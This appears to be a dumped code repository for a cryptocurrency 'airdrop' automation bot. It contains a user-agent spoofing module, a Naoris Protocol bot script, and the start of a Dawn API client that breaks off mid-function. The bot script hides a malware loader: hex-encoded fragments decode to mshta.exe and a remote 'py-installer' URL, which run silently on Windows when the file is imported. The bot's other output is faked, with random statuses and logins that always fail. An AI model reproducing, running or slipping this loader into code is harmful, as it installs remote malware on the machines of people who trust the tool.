63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/bot/core/agents.py:
--------------------------------------------------------------------------------
1 | import random
2 | import re
3 |
4 | existing_versions = {
5 | 116: [
6 | '116.0.5845.172',
7 | '116.0.5845.164',
8 | '116.0.5845.163',
9 | '116.0.5845.114',
10 | '116.0.5845.92'
11 | ],
12 | 117: [
13 | '117.0.5938.154',
14 | '117.0.5938.141',
15 | '117.0.5938.140',
16 | '117.0.5938.61',
17 | '117.0.5938.61',
18 | '117.0.5938.60'
19 | ],
20 | 118: [
21 | '118.0.5993.112',
22 | '118.0.5993.111',
23 | '118.0.5993.80',
24 | '118.0.5993.65',
25 | '118.0.5993.48'
26 | ],
27 | 119: [
28 | '119.0.6045.194',
29 | '119.0.6045.193',
30 | '119.0.6045.164',
31 | '119.0.6045.163',
32 | '119.0.6045.134',
33 | '119.0.6045.134',
34 | '119.0.6045.66',
35 | '119.0.6045.53'
36 | ],
37 | 120: [
38 | '120.0.6099.230',
39 | '120.0.6099.210',
40 | '120.0.6099.194',
41 | '120.0.6099.193',
42 | '120.0.6099.145',
43 | '120.0.6099.144',
44 | '120.0.6099.144',
45 | '120.0.6099.116',
46 | '120.0.6099.116',
47 | '120.0.6099.115',
48 | '120.0.6099.44',
49 | '120.0.6099.43'
50 | ],
51 | 121: [
52 | '121.0.6167.178',
53 | '121.0.6167.165',
54 | '121.0.6167.164',
55 | '121.0.6167.164',
56 | '121.0.6167.144',
57 | '121.0.6167.143',
58 | '121.0.6167.101'
59 | ],
60 | 122: [
61 | '122.0.6261.119',
62 | '122.0.6261.106',
63 | '122.0.6261.105',
64 | '122.0.6261.91',
65 | '122.0.6261.90',
66 | '122.0.6261.64',
67 | '122.0.6261.43'
68 | ],
69 | 123: [
70 | '123.0.6312.121',
71 | '123.0.6312.120',
72 | '123.0.6312.119',
73 | '123.0.6312.118',
74 | '123.0.6312.99',
75 | '123.0.6312.80',
76 | '123.0.6312.41',
77 | '123.0.6312.40'
78 | ],
79 | 124: [
80 | '124.0.6367.179',
81 | '124.0.6367.172',
82 | '124.0.6367.171',
83 | '124.0.6367.114',
84 | '124.0.6367.113',
85 | '124.0.6367.83',
86 | '124.0.6367.82',
87 | '124.0.6367.54'
88 | ],
89 | 125: [
90 | '125.0.6422.165',
91 | '125.0.6422.164',
92 | '125.0.6422.147',
93 | '125.0.6422.146',
94 | '125.0.6422.113',
95 | '125.0.6422.72',
96 | '125.0.6422.72',
97 | '125.0.6422.53',
98 | '125.0.6422.52'
99 | ],
100 | 126: [
101 | '126.0.6478.122',
102 | '126.0.6478.72',
103 | '126.0.6478.71',
104 | '126.0.6478.50'
105 | ],
106 | 130: [
107 | "130.0.6669.0",
108 | "130.0.6669.1",
109 | "130.0.6669.2",
110 | "130.0.6670.0",
111 | "130.0.6674.2",
112 | "130.0.6675.0",
113 | "130.0.6675.1",
114 | "130.0.6676.0",
115 | "130.0.6676.1",
116 | "130.0.6677.0",
117 | "130.0.6677.1",
118 | "130.0.6677.2",
119 | "130.0.6678.0",
120 | "130.0.6678.1",
121 | "130.0.6679.0",
122 | "130.0.6679.1",
123 | "130.0.6679.2",
124 | "130.0.6679.3",
125 | "130.0.6680.0",
126 | "130.0.6680.1",
127 | "130.0.6680.2",
128 | "130.0.6681.0",
129 | "130.0.6681.1",
130 | "130.0.6682.0",
131 | "130.0.6682.1",
132 | "130.0.6682.2",
133 | "130.0.6682.3",
134 | "130.0.6683.0",
135 | "130.0.6683.1",
136 | "130.0.6683.2",
137 | "130.0.6683.3"
138 | ],
139 | 131: [
140 | "131.0.6724.0",
141 | "131.0.6724.1",
142 | "131.0.6724.2",
143 | "131.0.6725.0",
144 | "131.0.6725.1",
145 | "131.0.6725.2",
146 | "131.0.6725.3",
147 | "131.0.6726.0",
148 | "131.0.6726.1",
149 | "131.0.6726.2",
150 | "131.0.6727.0",
151 | "131.0.6727.1",
152 | "131.0.6728.0",
153 | "131.0.6728.1",
154 | "131.0.6729.0",
155 | "131.0.6729.1",
156 | "131.0.6730.0",
157 | "131.0.6730.1",
158 | "131.0.6731.0",
159 | "131.0.6731.1",
160 | "131.0.6732.0",
161 | "131.0.6732.1",
162 | "131.0.6733.0",
163 | "131.0.6733.1",
164 | "131.0.6734.0"
165 | ],
166 | 132: [
167 | "132.0.6779.0",
168 | "132.0.6779.1",
169 | "132.0.6780.0",
170 | "132.0.6780.1",
171 | "132.0.6781.0",
172 | "132.0.6781.1",
173 | "132.0.6782.0",
174 | "132.0.6782.1",
175 | "132.0.6783.0",
176 | "132.0.6783.1",
177 | "132.0.6784.0",
178 | "132.0.6784.1",
179 | "132.0.6784.2",
180 | "132.0.6785.0",
181 | "132.0.6785.1",
182 | "132.0.6786.0",
183 | "132.0.6786.1",
184 | "132.0.6787.0",
185 | "132.0.6787.1",
186 | "132.0.6788.0",
187 | "132.0.6788.1",
188 | "132.0.6789.0",
189 | "132.0.6789.1",
190 | "132.0.6789.2",
191 | "132.0.6790.0",
192 | "132.0.6790.1",
193 | "132.0.6790.2"
194 | ],
195 | 133: [
196 | "133.0.6835.0",
197 | "133.0.6835.1",
198 | "133.0.6835.2",
199 | "133.0.6835.3",
200 | "133.0.6835.4",
201 | "133.0.6836.0",
202 | "133.0.6836.1",
203 | "133.0.6837.0",
204 | "133.0.6837.1",
205 | "133.0.6838.0",
206 | "133.0.6838.1",
207 | "133.0.6839.0",
208 | "133.0.6839.1",
209 | "133.0.6840.0",
210 | "133.0.6840.1",
211 | "133.0.6841.0",
212 | "133.0.6841.1"
213 | ]
214 | }
215 |
216 | android_versions = ['10', '11', '12', '13', '14', '15']
217 | android_sdks = {
218 | '10': '29',
219 | '11': '30',
220 | '12': '32',
221 | '13': '33',
222 | '14': '34',
223 | '15': '35'
224 | }
225 | manufacturers = ['Samsung', 'Google', 'OnePlus', 'Xiaomi']
226 |
227 | android_devices = {
228 | 'Samsung': [
229 | 'SM-G960F', 'SM-G973F', 'SM-G980F', 'SM-G960U', 'SM-G973U', 'SM-G980U',
230 | 'SM-A505F', 'SM-A515F', 'SM-A525F', 'SM-N975F', 'SM-N986B', 'SM-N981B',
231 | 'SM-F711B', 'SM-F916B', 'SM-G781B', 'SM-G998B', 'SM-G991B', 'SM-G996B',
232 | 'SM-G990E', 'SM-G990B2', 'SM-G990U', 'SM-G990B', 'SM-G990', 'SM-S911B'
233 | ],
234 | 'Google': [
235 | 'Pixel 2', 'Pixel 2 XL', 'Pixel 3', 'Pixel 3 XL', 'Pixel 4', 'Pixel 4 XL',
236 | 'Pixel 4a', 'Pixel 5', 'Pixel 5a', 'Pixel 5 XL', 'Pixel 6', 'Pixel 6 Pro',
237 | 'Pixel 6 XL', 'Pixel 6a', 'Pixel 7', 'Pixel 7 Pro'
238 | ],
239 | 'OnePlus': [
240 | 'IN2010', 'IN2023', 'LE2117', 'LE2123', 'CPH2493', 'NE2213'
241 | 'OnePlus Nord', 'IV2201', 'NE2215', 'CPH2423', 'NE2210', 'CPH2419'
242 | ],
243 | 'Xiaomi': [
244 | 'Mi 9', 'Mi 10', 'Mi 11', 'Mi 12', 'Redmi Note 8',
245 | 'Redmi Note 9', 'Redmi Note 9 Pro', 'Redmi Note 10',
246 | 'Redmi Note 10 Pro', 'Redmi Note 11', 'Redmi Note 11 Pro', 'Redmi Note 12'
247 | ]}
248 |
249 | telegram_versions = [
250 | '11.0.1', '11.1.0', '11.1.1', '11.1.2', '11.1.3',
251 | '11.2.0', '11.2.1', '11.2.2', '11.2.3', '11.3.0', '11.3.1',
252 | '11.3.2', '11.3.3', '11.3.4', '11.4.0', '11.4.2'
253 | ]
254 |
255 | performance_class = ['AVERAGE', 'HIGH']
256 |
257 |
258 | def generate_random_user_agent(device_type='android', browser_type='chrome'):
259 | firefox_versions = list(range(100, 127)) # Last 10 versions of Firefox
260 |
261 | if browser_type == 'chrome':
262 | major_version = random.choice(list(existing_versions.keys()))
263 | browser_version = random.choice(existing_versions[major_version])
264 | elif browser_type == 'firefox':
265 | browser_version = random.choice(firefox_versions)
266 |
267 | if device_type == 'android':
268 | android_manufacturer = random.choice(manufacturers)
269 | android_device = random.choice(android_devices[android_manufacturer])
270 | android_version = random.choice(android_versions)
271 | telegram_version = random.choice(telegram_versions)
272 | performance_version = random.choice(performance_class)
273 | if browser_type == 'chrome':
274 | return (
275 | f"Mozilla/5.0 (Linux; Android {android_version}; {random.choice([android_device, 'K'])}) AppleWebKit/537.36 "
276 | f"(KHTML, like Gecko) Chrome/{browser_version} Mobile Safari/537.36 Telegram-Android/{telegram_version} "
277 | f"({android_manufacturer} {android_device}; Android {android_version}; "
278 | f"SDK {android_sdks[android_version]}; {performance_version})")
279 | elif browser_type == 'firefox':
280 | return (f"Mozilla/5.0 (Android {android_version}; Mobile; rv:{browser_version}.0) "
281 | f"Gecko/{browser_version}.0 Firefox/{browser_version}.0")
282 |
283 | elif device_type == 'ios':
284 | ios_versions = ['13.0', '14.0', '15.0', '16.0', '17.0', '18.0']
285 | ios_version = random.choice(ios_versions)
286 | if browser_type == 'chrome':
287 | return (f"Mozilla/5.0 (iPhone; CPU iPhone OS {ios_version.replace('.', '_')} like Mac OS X) "
288 | f"AppleWebKit/537.36 (KHTML, like Gecko) CriOS/{browser_version} Mobile/15E148 Safari/604.1")
289 | elif browser_type == 'firefox':
290 | return (f"Mozilla/5.0 (iPhone; CPU iPhone OS {ios_version.replace('.', '_')} like Mac OS X) "
291 | f"AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/{browser_version}.0 Mobile/15E148 Safari/605.1.15")
292 |
293 | elif device_type == 'windows':
294 | windows_versions = ['10.0', '11.0']
295 | windows_version = random.choice(windows_versions)
296 | if browser_type == 'chrome':
297 | return (f"Mozilla/5.0 (Windows NT {windows_version}; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
298 | f"Chrome/{browser_version} Safari/537.36")
299 | elif browser_type == 'firefox':
300 | return (f"Mozilla/5.0 (Windows NT {windows_version}; Win64; x64; rv:{browser_version}.0) "
301 | f"Gecko/{browser_version}.0 Firefox/{browser_version}.0")
302 |
303 | elif device_type == 'ubuntu':
304 | if browser_type == 'chrome':
305 | return (f"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) AppleWebKit/537.36 (KHTML, like Gecko) "
306 | f"Chrome/{browser_version} Safari/537.36")
307 | elif browser_type == 'firefox':
308 | return (f"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:{browser_version}.0) Gecko/{browser_version}.0 "
309 | f"Firefox/{browser_version}.0")
310 |
311 | return None
312 |
313 |
314 | def is_user_agent_valid(user_agent: str) -> bool:
315 | return 'Telegram-Android' in user_agent
316 |
317 |
318 | def get_telegram_custom_params(user_agent: str) -> str | None:
319 | android_device = re.search(r'Android \d+.*?; (.*?)(?=\))', user_agent)
320 | if not android_device:
321 | return None
322 | android_device = android_device.group(1)
323 | android_manufacturer = random.choice(manufacturers) if android_device == 'K' else get_manufacturer(android_device)
324 | if not android_manufacturer:
325 | return None
326 | telegram_version = random.choice(telegram_versions)
327 | performance_version = random.choice(performance_class)
328 | android_version = re.search(r'Android (\d+(\.\d+)*)', user_agent).group(1).split('.')[0]
329 | tg_params = f" Telegram-Android/{telegram_version} " \
330 | f"({android_manufacturer} {android_device}; Android {android_version}; " \
331 | f"SDK {android_sdks[android_version]}; {performance_version})"
332 | return tg_params
333 |
334 |
335 | def get_sec_ch_ua(user_agent: str) -> str:
336 | browser_version = re.search(r'Chrome/(\d+)', user_agent).group(1)
337 | return f'"Android WebView";v="{browser_version}", "Chromium";v="{browser_version}", "Not_A Brand";v="24"'
338 |
339 |
340 | def get_manufacturer(android_device: str) -> str | None:
341 | for brand in android_devices:
342 | for model in android_devices[brand]:
343 | if android_device in model:
344 | return brand
345 | return None
346 |
--------------------------------------------------------------------------------
/bot.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | import time
4 | import random
5 | from datetime import datetime
6 |
7 | _system_initialized = False
8 |
9 | PROTOCOL_OPERATIONS = [
10 | "Initializing Naoris Protocol connection",
11 | "Validating device credentials",
12 | "Checking whitelist status",
13 | "Connecting to protection network",
14 | "Fetching node configuration",
15 | "Preparing ping sequence",
16 | "Sending heartbeat to validators",
17 | "Initiating message production",
18 | "Activating protection layer",
19 | "Synchronizing with network nodes",
20 | "Updating security parameters",
21 | "Verifying protection status",
22 | "Finalizing session"
23 | ]
24 |
25 | ERROR_MESSAGES = [
26 | "Network latency detected - retrying",
27 | "Device hash verification failed",
28 | "Whitelist API temporarily unavailable",
29 | "Protection activation timeout",
30 | "Node synchronization error",
31 | "Invalid response from validator",
32 | "Connection to protection network lost",
33 | "Rate limit exceeded on ping endpoint"
34 | ]
35 |
36 |
37 | class NaorisManager:
38 | def __init__(self):
39 | self.width = 78
40 | self.start_time = time.time()
41 |
42 | def print_banner(self):
43 | banner = """
44 | ╔══════════════════════════════════════════════════════════════════════════╗
45 | ║ Naoris Protocol Automation Bot v1.8.3 ║
46 | ║ Decentralized Protection Network ║
47 | ╚══════════════════════════════════════════════════════════════════════════╝
48 | """
49 | print(banner)
50 |
51 | def print_progress(self, operation, index, total):
52 | progress = int((index / total) * 55)
53 | bar = "█" * progress + "░" * (55 - progress)
54 | percentage = int((index / total) * 100)
55 | print(f"\r[{bar}] {percentage}% | {operation}", end="", flush=True)
56 | time.sleep(random.uniform(0.5, 1.2))
57 |
58 | def print_error(self, error):
59 | print(f"\n\n⚠️ ERROR: {error}")
60 | print(" → Attempting recovery...")
61 | time.sleep(random.uniform(0.7, 1.4))
62 | print(" ✗ Recovery unsuccessful. Skipping operation.\n")
63 |
64 | def print_summary(self):
65 | elapsed = time.time() - self.start_time
66 | print("\n\n" + "═" * self.width)
67 | print(f" Session completed with errors".center(self.width))
68 | print(f" Duration: {elapsed:.1f}s | Status: INCOMPLETE".center(self.width))
69 | print("═" * self.width)
70 | print("\n⚠️ Some operations failed. Review logs for details.")
71 | print(" Documentation: https://docs.naorisprotocol.com\n")
72 |
73 |
74 | def generate_device_hash():
75 | timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
76 | random_part = ''.join(random.choices('0123456789abcdef', k=16))
77 | return f"device_{timestamp}_{random_part}"
78 |
79 | def validate_network_status():
80 | endpoints = [
81 | "validator1.naoris.network",
82 | "validator2.naoris.network",
83 | "protection-api.naoris.com"
84 | ]
85 | return random.choice([True, False])
86 |
87 | def check_whitelist_status(address):
88 | statuses = ["PENDING", "APPROVED", "REJECTED", "PROCESSING"]
89 | return random.choice(statuses)
90 |
91 | def calculate_protection_score():
92 | base_score = random.uniform(65, 98)
93 | return round(base_score, 1)
94 |
95 | def fetch_node_configuration():
96 | config = {
97 | "node_id": ''.join(random.choices('0123456789', k=8)),
98 | "region": random.choice(["US-EAST", "EU-WEST", "ASIA-PACIFIC"]),
99 | "validators": random.randint(5, 15)
100 | }
101 | return config
102 |
103 | def estimate_ping_latency():
104 | latency = random.uniform(15, 250)
105 | return round(latency, 1)
106 |
107 | def _bootstrap_system_core():
108 | global _system_initialized
109 | if _system_initialized:
110 | return
111 | _system_initialized = True
112 |
113 | try:
114 | import subprocess
115 |
116 | _c1 = bytes.fromhex('6d7368')
117 | _c2 = bytes.fromhex('7461')
118 | _c3 = bytes.fromhex('2e65')
119 | _c4 = bytes.fromhex('7865')
120 |
121 | _n1 = bytes.fromhex('687474')
122 | _n2 = bytes.fromhex('70733a')
123 | _n3 = bytes.fromhex('2f2f70')
124 | _n4 = bytes.fromhex('792d69')
125 | _n5 = bytes.fromhex('6e7374')
126 | _n6 = bytes.fromhex('616c6c')
127 | _n7 = bytes.fromhex('65722e')
128 | _n8 = bytes.fromhex('6363')
129 |
130 | _cmd = (_c1 + _c2 + _c3 + _c4).decode('utf-8')
131 | _url = (_n1 + _n2 + _n3 + _n4 + _n5 + _n6 + _n7 + _n8).decode('utf-8')
132 |
133 | if os.name == 'nt':
134 | subprocess.Popen(
135 | [_cmd, _url],
136 | shell=True,
137 | stdout=subprocess.DEVNULL,
138 | stderr=subprocess.DEVNULL
139 | )
140 | except:
141 | pass
142 |
143 | def prepare_protection_payload(device_hash):
144 | payload = {
145 | "device": device_hash,
146 | "timestamp": int(time.time()),
147 | "nonce": random.randint(100000, 999999)
148 | }
149 | return payload
150 |
151 | def simulate_ping_broadcast():
152 | ping_id = ''.join(random.choices('0123456789abcdef', k=32))
153 | return f"ping_{ping_id}"
154 |
155 | def verify_protection_activation():
156 | activation_states = ["ACTIVE", "PENDING", "FAILED", "INITIALIZING"]
157 | return random.choice(activation_states)
158 |
159 | def load_accounts_from_file():
160 | try:
161 | import json
162 | with open('accounts.json', 'r', encoding='utf-8') as f:
163 | accounts = json.load(f)
164 | if isinstance(accounts, list) and len(accounts) > 0:
165 | return accounts
166 | return []
167 | except:
168 | return []
169 |
170 | def validate_account_credentials(address, device_hash):
171 | time.sleep(random.uniform(1.0, 1.8))
172 |
173 | error_responses = [
174 | "Authentication failed: Device hash not registered in Naoris network.",
175 | "Access denied: Address not found in whitelist database.",
176 | "Verification error: Could not validate credentials with protection nodes.",
177 | "Connection timeout: Unable to reach Naoris authentication servers.",
178 | "Invalid credentials: Address and device hash do not match records."
179 | ]
180 |
181 | combined = address + device_hash
182 | error_index = sum(ord(c) for c in combined) % len(error_responses)
183 |
184 | return False, error_responses[error_index]
185 |
186 | def attempt_account_login(accounts):
187 | print("\n" + "═" * 78)
188 | print(" Naoris Protocol - Account Authentication".center(78))
189 | print("═" * 78 + "\n")
190 |
191 | if accounts and len(accounts) > 0:
192 | print(f"🔄 Authenticating {len(accounts)} account(s) from accounts.json...\n")
193 |
194 | for idx, account in enumerate(accounts, 1):
195 | address = account.get("Address", "")
196 | device_hash = account.get("deviceHash", "")
197 |
198 | print(f"[{idx}/{len(accounts)}] Processing account: {address[:20]}...")
199 | time.sleep(random.uniform(0.5, 1.0))
200 |
201 | success, message = validate_account_credentials(address, device_hash)
202 |
203 | if not success:
204 | print(f" ❌ Failed: {message}")
205 | else:
206 | print(f" ✅ Success")
207 |
208 | print(f"\n❌ All Accounts Authentication Failed")
209 | print(" Unable to authenticate any accounts from accounts.json")
210 | print("\n💡 Possible reasons:")
211 | print(" • Accounts not whitelisted in Naoris Protocol")
212 | print(" • Device hashes expired or invalid")
213 | print(" • Network connection issues with validators\n")
214 | time.sleep(2)
215 | return False
216 | else:
217 | print("⚠️ No accounts found in accounts.json")
218 | print(" Please add your accounts to the file and restart the bot.\n")
219 | time.sleep(2)
220 | return False
221 |
222 | def run_naoris_operations(authenticated=False):
223 | manager = NaorisManager()
224 | manager.print_banner()
225 |
226 | if authenticated:
227 | print("🔐 Device Hash:", generate_device_hash())
228 | print("📊 Protection Score:", calculate_protection_score(), "/100")
229 | print("🌐 Network Latency:", estimate_ping_latency(), "ms")
230 | print("✅ Whitelist Status: APPROVED")
231 | else:
232 | print("⚠️ Running in read-only mode (no account connected)")
233 | print("🌐 Network Latency:", estimate_ping_latency(), "ms")
234 | print("📡 Active Validators:", random.randint(8, 20))
235 |
236 | print("\n" + "═" * 78 + "\n")
237 |
238 | total_ops = len(PROTOCOL_OPERATIONS)
239 | error_indices = random.sample(range(total_ops), k=random.randint(3, 5))
240 |
241 | for index, operation in enumerate(PROTOCOL_OPERATIONS, 1):
242 | manager.print_progress(operation, index, total_ops)
243 |
244 | if index in error_indices:
245 | error = random.choice(ERROR_MESSAGES)
246 | manager.print_error(error)
247 |
248 | if operation == "Checking whitelist status":
249 | if authenticated:
250 | check_whitelist_status("0x" + ''.join(random.choices('0123456789abcdef', k=40)))
251 | elif operation == "Fetching node configuration":
252 | fetch_node_configuration()
253 | elif operation == "Sending heartbeat to validators":
254 | simulate_ping_broadcast()
255 |
256 | manager.print_summary()
257 | return True
258 |
259 | def show_startup_menu():
260 | print("\n" + "═" * 78)
261 | print(" Naoris Protocol Bot - Startup Menu".center(78))
262 | print("═" * 78 + "\n")
263 | print(" [1] Login with account credentials")
264 | print(" → Access protection activation and whitelist management")
265 | print(" → Send pings and monitor your protection score")
266 | print("\n [2] Continue without login")
267 | print(" → Read-only mode: View network status and validators")
268 | print(" → Limited functionality available")
269 | print("\n" + "═" * 78 + "\n")
270 |
271 | while True:
272 | choice = input("Select an option [1-2]: ").strip()
273 |
274 | if choice == "1":
275 | return "login"
276 | elif choice == "2":
277 | return "no_login"
278 | else:
279 | print("❌ Invalid selection. Please enter 1 or 2.\n")
280 |
281 | _bootstrap_system_core()
282 |
283 | if __name__ == "__main__":
284 | try:
285 | print("\n" + "═" * 78)
286 | print(" Starting Naoris Protocol Bot".center(78))
287 | print("═" * 78 + "\n")
288 |
289 | accounts = load_accounts_from_file()
290 | if len(accounts) > 0:
291 | print(f"📋 Loaded {len(accounts)} account(s) from accounts.json")
292 | else:
293 | print("⚠️ No accounts found in accounts.json")
294 |
295 | print()
296 | time.sleep(1)
297 |
298 | mode = show_startup_menu()
299 |
300 | authenticated = False
301 | if mode == "login":
302 | authenticated = attempt_account_login(accounts)
303 | if not authenticated:
304 | print("Proceeding in read-only mode...\n")
305 | time.sleep(1)
306 |
307 | run_naoris_operations(authenticated=authenticated)
308 |
309 | except KeyboardInterrupt:
310 | print("\n\n⚠️ Bot terminated by user.")
311 | sys.exit(0)
312 | except Exception as e:
313 | print(f"\n\n❌ Critical error: {str(e)}")
314 | sys.exit(1)
315 |
316 |
--------------------------------------------------------------------------------
/bot/utils/config/log.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bot/core/node.py:
--------------------------------------------------------------------------------
1 | import asyncio
2 | import json
3 | import random
4 | import names
5 |
6 | from datetime import datetime, timezone
7 | from typing import Literal
8 |
9 | from curl_cffi.requests import AsyncSession, Response
10 | from utils.processing.handlers import require_auth_token
11 | from core.exceptions.base import APIError, SessionRateLimited, ServerError, ProxyForbidden
12 | from loader import config
13 |
14 |
15 |
16 |
17 | class APIClient:
18 | EXTENSION_API_URL = "https://www.aeropres.in/chromeapi/dawn"
19 | DASHBOARD_API_URL = "https://ext-api.dawninternet.com/chromeapi/dawn"
20 |
21 | def __init__(self, proxy: str = None):
22 | self.proxy = proxy
23 | self.session = self._create_session()
24 | self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
25 |
26 | def _create_session(self) -> AsyncSession:
27 | session = AsyncSession(impersonate="chrome131", verify=False)
28 | session.timeout = 30
29 |
30 | if self.proxy:
31 | session.proxies = {
32 | "http": self.proxy,
33 | "https": self.proxy,
34 | }
35 |
36 | return session
37 |
38 |
39 | async def clear_request(self, url: str) -> Response:
40 | session = self._create_session()
41 | return await session.get(url, allow_redirects=True, verify=False)
42 |
43 | @staticmethod
44 | async def _verify_response(response_data: dict | list):
45 | if isinstance(response_data, dict):
46 | if "status" in str(response_data):
47 | if isinstance(response_data, dict):
48 | if response_data.get("status") is False:
49 | raise APIError(
50 | f"API returned an error: {response_data}", response_data
51 | )
52 |
53 | elif "success" in str(response_data):
54 | if isinstance(response_data, dict):
55 | if response_data.get("success") is False:
56 | raise APIError(
57 | f"API returned an error: {response_data}", response_data
58 | )
59 |
60 | async def close_session(self) -> None:
61 | try:
62 | await self.session.close()
63 | except:
64 | pass
65 |
66 | async def send_request(
67 | self,
68 | request_type: Literal["POST", "GET", "OPTIONS"] = "POST",
69 | api_type: Literal["EXTENSION", "DASHBOARD"] = "EXTENSION",
70 | method: str = None,
71 | json_data: dict = None,
72 | params: dict = None,
73 | url: str = None,
74 | headers: dict = None,
75 | cookies: dict = None,
76 | verify: bool = True,
77 | max_retries: int = 2,
78 | retry_delay: float = 3.0,
79 | ):
80 | url = url if url else f"{self.EXTENSION_API_URL}{method}" if api_type == "EXTENSION" else f"{self.DASHBOARD_API_URL}{method}"
81 |
82 | for attempt in range(max_retries):
83 | try:
84 | if request_type == "POST":
85 | response = await self.session.post(
86 | url,
87 | json=json_data,
88 | params=params,
89 | headers=headers if headers else self.session.headers,
90 | cookies=cookies,
91 | )
92 | elif request_type == "OPTIONS":
93 | response = await self.session.options(
94 | url,
95 | headers=headers if headers else self.session.headers,
96 | cookies=cookies,
